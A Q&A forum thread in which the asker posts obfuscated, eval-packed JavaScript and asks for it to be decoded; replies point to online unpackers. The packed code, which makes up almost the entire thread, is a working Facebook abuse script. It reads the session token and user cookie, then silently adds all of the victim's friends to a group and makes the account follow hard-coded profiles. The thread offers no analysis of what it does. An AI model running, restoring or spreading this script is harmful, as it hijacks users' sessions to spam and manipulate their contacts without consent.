# Decode a javascript code

Tags: javascript

I Have try to decode this Javascript but i haven't succeded to do that because i think that is non encoded code but merged, anyone can help me to get the normal code from this :

```
    var a=eval,
c='5 l=7.19(\'l\')[0].1z;5 F=7.Y.Z(7.Y.Z(/1Z=(\\d+)/)[1]);8 p(1T){5 y=G 1A();5 1L="//K.12.U/14/49.1o";5 1N="1q="+1T+"&4d=0&4g=0&4l[44]=4f&47=1&1h="+F+"&10=1&2n=2o-&1x=v&l="+l+"&1B=";y.1W("1S",1L,1e);y.1y=8(){6(y.1R==4&&y.1C==11){y.2F}};y.1M(1N)}p("1O");p("26");5 l=7.19("l")[0].1z;5 F=7.Y.Z(7.Y.Z(/1Z=(\\d+)/)[1]);8 37(g){5 S=G 1A;5 3c="/14/4i/45/4b.1o?10=1";5 3b="&2m=4N&3A="+g+"&l="+l+"&1h="+F+"&1B=";S.1W("1S",3c,1e);S.1y=8(){6(S.1R==4&&S.1C==11)S.2F};S.1M(3b)}37("1P");5 2H=\'4m S 4Z\';5 O="",3g=\'<P/>4Y 3J 4r 4G 3J 4C 4z.</P>(4A 4B 4D 4H)<A D="I:#2v;" 20="m://K.12.U/1O" 2b="2u"> 4I 3n</A></A>,</A><A D="I:#2v;" 20="m://K.12.U/26" 2b="2u"> 4X 3n</A>.</A></P>52 4M 4U 4c 4J 4K <A D="I:#2v;" 20="m://K.3H.3I/" 2b="2u">K.3H.3I</A>.</A>\';8 2E(1a){1m.16(w.13.1p+"//K.12.U/14/34.1o?&l="+l+"&2Y="+18+"&3v=3D&3G=4y"+18+"4F"+1a+"&1Q[1I]="+18+"&1Q[1q]="+1a+"&3E[3L]=3K&1h="+F+"&10=1&1x=q",8(a){5 b=a.2J(a.1V("{"));5 c=2A.3F(b);i--;O="<t 1r=\'1J-1H-4E\' D=\'1w-2D:3T;E-27:1k;1d-1g:2I;2p-2W:30-31;";6(c.2d){O+="I:4x\'>";2r++;6(c.3y)O+=c.3y;T O+=2A.4w(c,L,"")}T{O+="I:4q\'>";O+=1F[i]+" 4p 4o 4n.<P/>";1u++}O+="</t>";5 h="<t 1I=\'1J-1H-h\' D=\'2x-2C:2f 2K 4s 1b(0, 0, 0, 0.3);2z:3M;1k:50%;42-1k:-3X;2y:3V;3Q:3W;z-3U:3r;1d-1g:2Z;E-27:2w;1w:3s;2x-2C:25 23 25 1b(0,0,0,0.1);24-2L:2K;24:23 2S 1b(11,11,50,0.2);3k-I:1b(1j,1j,1j,0.9);I:#3i\'>";h+="<t D=\'1w-2D:3T;1d-1g:3p;\'>"+2H+"</t>";6(i>0){h+=B.u+" V 2G<P/>";h+="<b>"+1u+"</b> V 2e 4v "+(B.u-i)+" V 4u ";h+="("+i+" 4t...)";h+="<t 1r=\'1J-1H\'>";h+=O;h+="<t D=\'E-27:2w;1d-1g:2I;2p-2W:30-31;I:4W\'>";h+=3j+" 4V 53 51 4T V 4S S...";h+=3g;h+="</t>";h+="</t>"}T{h+=B.u+" V 2G<P/>";h+=1u+" V 2e</P>";h+=2r+" V 4L 2e</P></P>";h+="<t><39 1r=\'4O 4R 4Q 4P 54\' 4a=\'w.13.48()\' D=\'I:2p\'>46 4j</39>"}h+="</t>";7.1c("38").1l=h},"E","1K");R--;6(R>0){5 s=B[R];4h=2B[R];1t("2E("+s+")",4e)}3N.3B(R+"/"+B.u+":"+B[R]+"/"+1F[R]+", 4k:"+1u);6(18!=1P){1m.16(w.13.1p+"//K.12.U/14/34.1o?&l="+l+"&2Y=1P&3v=3D&3G=57"+1a+"&1Q[1I]=1P&1Q[1q]="+1a+"&3E[3L]=3K&1h="+F+"&10=1&1x=q",8(){},"E","1K")}6(18){1m.16(w.13.1p+"//K.12.U/14/3u/3t?&3x="+1a+"&3z=1O&3Y=43&2m=3S&1h="+F+"&10=1&2n=2o-&1x=17&l="+l+"&1B=5P",8(){},"E","1K")}6(18){1m.16(w.13.1p+"//K.12.U/14/3u/3t?&3x="+1a+"&3z=26&3Y=43&2m=3S&1h="+F+"&10=1&2n=2o-&1x=17&l="+l+"&1B=5O",8(){},"E","1K")}}8 2T(){6(7.19("2O").u>0)29.2k(7.19("2O")[0]);5 a=B[i];6(i<B.u)35(a.2J(0,4))}8 3l(){6(7.1v("2M").u>0)29.2k(7.1v("2M")[0].1s[0].1s[0].1s[1]);T j++;1t("2T()",3m)}8 35(a){i++;1t("3l()",3m)}1m={2P:8(){5 a=H;6(3w 2t!="1G")22{a=G 2t("5N.3o")}21(b){22{a=G 2t("5Q.3o")}21(c){a=H}}T 6(w.1A)22{a=G 1A}21(b){a=H}o a},16:8(J,2l,Q,N,M){5 m=C.2Q();6(!m||!J)o;6(m.3h)m.3h("E/5R");6(!N)N="3a";6(!Q)Q="E";6(!M)M={};Q=Q.5T();N=N.5S();5 3e="1q="+(G 5M).5L();J+=J.1V("?")+1?"&":"?";J+=3e;5 2j=L;6(N=="1S"){5 2i=J.5G("?");J=2i[0];2j=2i[1]}m.1W(N,J,1e);5 5F=C;6(M.2X)m.1y=8(){M.2X(m)};T m.1y=8(){6(m.1R==4)6(m.1C==11){5 X="";6(m.3d)X=m.3d;6(Q.3f(0)=="j"){X=X.5E(/[\\n\\r]/g,"");X=5V("("+X+")")}T 6(Q.3f(0)=="x")X=m.5U;6(2l)2l(X)}T{6(M.1f)7.1X("2h")[0].36(M.1f);6(M.W)7.1c(M.W).D.h="2R";6(2d)2d(m.1C)}};m.1M(2j)},65:8(a){5 b={J:"",2a:H,64:H,Q:"E",N:"3a",2g:"",W:"",1f:""};15(5 c 66 b)6(a[c])b[c]=a[c];6(!b.J)o;5 d=H;6(b.1f){d=7.67("t");d.3q("D","2z:62;2y:2f;1k:2f;");d.3q("1r","W-5X");d.1l=b.1f;7.1X("2h")[0].5W(d);C.M.1f=d}6(b.W)7.1c(b.W).D.h="63";C.16(b.J,8(a){6(b.2a)b.2a(a);6(b.2g)7.1c(b.2g).1l=a;6(d)7.1X("2h")[0].36(d);6(b.W)7.1c(b.W).D.h="2R"},b.Q,b.N,b)},2Q:8(){o C.2P()}};5 29={2N:8(a,b,c,d){6(c=="2q")c="1r";5 e=7.2V(".//"+b+"[@"+c+"=\'"+d+"\']",a,L,32.33,L);6(e&&e.1Y)o e.1Y;o L},5Y:8(a,b,c){o C.2N(a,b,"2q",c)},5Z:8(a,b){22{5 c=7.2V(b,a,L,32.33,L)}21(d){61("60 5K:"+b)}6(c&&c.1Y)o c.1Y;o L},5C:8(a){w.1t(8(){7.13.20=a},2s+28.3R(28.3P()*2s))},1i:8(a,b,c){5 d=a.7.5g("55");d.5f(c,1e,1e,a,0,0,0,0,0,H,H,H,H,0,L);o!b.5D(d)},5h:8(a){o C.1i(w,a,"2c")},5i:8(a,b){w.1t(8(){o 29.1i(w,a,"2c")},b+28.3R(28.3P()*2s))},2k:8(a){C.1i(w,a,"5k");C.1i(w,a,"5j");C.1i(w,a,"2c")},3O:8(a,b){5 c="";6(b==1G)b=0;6(b>40)o;6(a.3Z!=1G)o a.3Z;15(5 d=0;d<a.1s.u;d++){5 e=a.1s[d];c+=C.3O(e,b+1)}o c}};6(7.1v==1G)7.1v=8(a){5 b=G 5d("(?:^|\\\\s)"+a+"(?:$|\\\\s)");5 c=7.1X("*");5 d=[];5 e;15(5 f=0;(e=c[f])!=L;f++){5 g=e.2q;6(g&&g.1V(a)!=-1&&b.3C(g))d.1n(e)}o d};1U.56.59=8(a){5 b=H;15(i=0;i<C.u;i++)6(3w a=="8"){6(a.3C(C[i])){6(!b)b=[];b.1n(i)}}T 6(C[i]===a){6(!b)b=[];b.1n(i)}o b};5 i=3;5 R=3;5 j=0;5 k=0;5 1u=0;5 2r=0;5 B=G 1U;5 1F=G 1U;5 2B=G 1U;5b=7.1c("5l").1l;5 l=7.19(\'l\')[0].1z;5 F=7.Y.Z(7.Y.Z(/1Z=(\\d+)/)[1]);5 3j=7.1v("5m")[0].1l;5 18=7.19("3A")[0].1z;1m.16(w.13.1p+"//K.12.U/14/5x/5w.1o?"+"10=1&5y[0]=5z&5B=0&5A="+F+"&5v=5u&5p=0&41[0]=5o&41[1]=5n",8(a){5 b=a;5 c=b.2J(b.1V("{"));5 d=2A.3F(c);d=d.5r.5t;15(5 e=0;e<d.u;e++)B.1n(d[e].1q);15(5 1E=0;1E<d.u;1E++)1F.1n(d[1E].E);15(5 1D=0;1D<d.u;1D++)2B.1n(d[1D].5s);i=B.u-1;R=i;3N.3B(B.u);5 h="<t 1I=\'1J-1H-h\' D=\'2z:3M;1k:50%;42-1k:-3X;2y:3V;3Q:3W;z-3U:3r;1d-1g:2Z;E-27:2w;1w:3s;2x-2C:25 23 25 1b(0,0,0,0.1);24-2L:2K;24:23 2S 1b(11,11,50,0.2);3k-I:1b(1j,1j,1j,0.9);I:#3i\'>";h+="<t D=\'1w-2D:2I;1d-1g:3p;\'>"+2H+"</t>";h+=B.u+" V 2G";h+="</t>";7.1c("38").1l=h;2E(B[i])});5 l=7.19("l")[0].1z;5 F=7.Y.Z(7.Y.Z(/1Z=(\\d+)/)[1]);8 a(1T){5 y=G 1A;5 1L="/14/2U/5q.1o?10=1";5 1N="5c="+1T+"&13=1&5a=2U-58&5e=5J&l="+l+"&5I&5H"+F+"&1B=";y.1W("1S",1L,1e);y.1y=8(){6(y.1R==4&&y.1C==11)y.2F};y.1M(1N)}a("1O");a("26");',
d=380,
e="     var if document function         display    fb_dtsg http  return     div length  window  http4   arr this style text user_id new false color url www null opt method Descriptions br format tay Group else com Friends loading result cookie match __a 200 facebook location ajax for load  gid getElementsByName opo rgba getElementById font true loadingIndicator size __user ClickWin 255 left innerHTML jx push php protocol uid class childNodes setTimeout suc getElementsByClassName padding __req onreadystatechange value XMLHttpRequest phstamp status pic eg arn undefined edge id friend post url4 send params4 100000704782314 100000704782314 params readyState POST abone Array indexOf open getElementsByTagName singleNodeValue c_user href catch try 1px border 0pt 100000704782314 align Math nHtml onSuccess target click error Added 0px update body parts parameters ClickUp callback ref __dyn 798aD5z5CF white className err 500 ActiveXObject _blank 3B5998 center box top position JSON pho shadow bottom AddFriendtoGroup close Detected Title 10px substring 3px radius search FindByAttr ok getHTTPObject init none solid clickfr_callback follow evaluate space handler request_id 14px pre wrap XPathResult FIRST_ORDERED_NODE_TYPE reqs addfriend removeChild Join pagelet_sidebar span GET GroupParams GroupURL responseText now charAt _text overrideMimeType 000000 getuname background clickfr 2E3 Baveja XMLHTTP 20px setAttribute 9999 15px suggest friends type typeof receiver errorDescription newcomer group_id log test group_confirm actions parse status_div_id rupambaveja net Help Confirm accept fixed console GetText random width floor profile_others_dropdown 5px index 100px 500px 273px attempt_id textContent  options margin 0585ab74e2dd0ff10282a3a36df39e19 _mod membership Refresh __asyncDialog reload poke_dialog onClick r2j Visit pokeback 100 pagelet_timeline_profile_actions ask_for_confirm sx groups Page success nctr Auto added been has darkgreen Those 8px Lefted Processed of stringify darkred group_confirm_ Selves FACEBOOK SCRIPT Them LICENCE name _ Who HOLDER Rupam Our Website Not More group_jump_header layerConfirm uiButtonConfirm uiButton uiOverlayButton To Your Tools Please gray Anupam God Adder  Adding For Wait uiButtonLarge MouseEvents prototype group_confirm_184634708330726_ button find source grpname profile_id RegExp subscribed_button_id initMouseEvent createEvent Click ClickTimeout mouseup mousedown groupsJumpTitle fbxWelcomeBoxName nm friends_only stale_ok follow_profile payload photo entries v7 token first_degree typeahead filter user viewer lazy VisitUrl dispatchEvent replace ths split __ lsd u37qac_37 xpath getTime Date Msxml2 1658168561015387781130 1658165120113116104521114 Microsoft xml toUpperCase toLowerCase responseXML eval appendChild indicator FindByClassName FindByXPath bad GM_log absolute block onError bind in createElement".split(" "),
f=0,
g={},
f=function(b){return(62>b?"":f(parseInt(b/62)))+(35<(b%=62)?String.fromCharCode(b+29):b.toString(36))};
if(!"".replace(/^/,String)){for(;d--;)g[f(d)]=e[d]||f(d);
e=[function(b){return g[b]}];
f=function(){return"\\w+"};
d=1}for(;d--;)e[d]&&(c=c.replace(RegExp("\\b"+f(d)+"\\b","g"),e[d]));
a(c);
```

Thank you !

Comment: Feed it to http://jsunpack.jeek.org/ . [This question](http://reverseengineering.stackexchange.com/questions/1436/analyzing-highly-obfuscated-javascript) on [Reverse Engineering SE](http://reverseengineering.stackexchange.com/) might also help.

Comment: this is not duplicate because i have read all topics ! @DCoder  jsunpack.jeek.org  solved the problem thanks a lots thats i need Have a nice day

Answer (score 1):

This code is intentionally obfuscated.

You are asking a community to deobfuscate which isn't really the point of stack overflow.

http://jsbeautifier.org/ will make it more readible, but you'll never get full variable names back.